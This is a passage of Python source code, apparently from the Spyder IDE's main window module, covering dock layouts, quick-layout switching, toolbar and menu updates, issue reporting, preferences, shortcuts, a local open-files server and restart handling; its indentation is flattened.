# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
# widget.updateGeometry()
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor is to adjust height based on the useful
# estimated area in the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
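# The fixed min/max sizes force the desired geometry; layout_fix_timer()
# restores the original limits once Qt has finished applying the layout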
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
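# layout_index mixes the string 'default' with the integer indices of the
# active user layouts; quick_layout_switch() accepts both forms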
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.Yes
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make a new layout active, even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with the same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (i.e., where the index is greater than the number of
# defaults). See issue 6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def valid_project(self):
"""Handle an invalid active project."""
path = self.projects.get_active_project_path()
if path:
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
from spyder.widgets.ipythonconsole import ControlWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
widget = self.previous_focused_widget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
console = isinstance(widget, (ShellBaseWidget, ControlWidget))
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = self.get_focus_widget_properties()
for action in self.editor.search_menu_actions:
try:
action.setEnabled(self.editor.isAncestorOf(widget))
except RuntimeError:
pass
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
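# Replace each known CONF_SECTION name in `order` with the plugin's toggle
# action, append actions for plugins not listed, and drop any names that
# were never matched before filling the menu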
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
if CONF.get('main', 'single_instance') and not self.new_instance:
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
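# Hide every plugin's dockwidget and remember which plugin currently
# contains the focused widget; that one will be maximized below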
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" loop.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show Mercurial revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut.
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
<br>Many thanks to all the Spyder beta testers and regular users.
<p>For help with Spyder errors and crashes, please read our
<a href="%s">Troubleshooting page</a>, and for bug reports and
feature requests, visit our <a href="%s">Github website</a>.
For project discussion, see our <a href="%s">Google Group</a>.
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://python-xy.github.io/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s
<p><small>Most of the icons for the Spyder 2 theme come from the Crystal
Project (© 2006-2007 Everaldo Coelho). Other icons for that
theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
Kamiyamane</a> (all rights reserved) and from
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a></small>.
"""
% (versions['spyder'], revlink, __project_url__, __trouble_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
def render_issue(self, description='', traceback=''):
"""Render issue before sending it to Github"""
# Get component versions
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
# Make a description header in case no description is supplied
if not description:
description = "### What steps reproduce the problem?"
# Make error section from traceback and add appropriate reminder header
if traceback:
error_section = ("### Traceback\n"
"```python-traceback\n"
"{}\n"
"```".format(traceback))
else:
error_section = ''
issue_template = """\
## Description
{description}
{error_section}
## Versions
* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}
### Dependencies
```
{dependencies}
```
""".format(description=description,
error_section=error_section,
spyder_version=versions['spyder'],
commit=revision,
python_version=versions['python'],
qt_version=versions['qt'],
qt_api_name=versions['qt_api'],
qt_api_version=versions['qt_api_ver'],
os_name=versions['system'],
os_version=versions['release'],
dependencies=dependencies.status())
return issue_template
@Slot()
def report_issue(self, body=None, title=None, open_webpage=False):
"""Report a Spyder issue to github, generating body text if needed."""
if body is None:
from spyder.widgets.reporterror import SpyderErrorDialog
report_dlg = SpyderErrorDialog(self, is_report=True)
report_dlg.show()
else:
if open_webpage:
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
from qtpy.QtCore import QUrlQuery
url = QUrl(__project_url__ + '/issues/new')
query = QUrlQuery()
query.addQueryItem("body", quote(body))
if title:
query.addQueryItem("title", quote(title))
url.setQuery(query)
QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
# If focused widget isn't valid try the last focused
if not isinstance(widget, TextEditBaseWidget):
widget = self.previous_focused_widget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in the IPython console and, if requested, give focus
back to the Editor.
"""
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
active_path = [p for p in self.path if p not in self.not_active_path]
return active_path + self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
for path in self.path + self.project_path:
while path in sys.path:
sys.path.remove(path)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path,
self.not_active_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
try:
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
encoding.writelines(self.not_active_path,
self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError:
pass
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('main', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
dlg = ShortcutsSummaryDialog(None)
dlg.exec_()
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 'while 1' kept from the original; it was marginally faster than 'while True' on Python 2
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset is True, Spyder settings are reset to their defaults on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
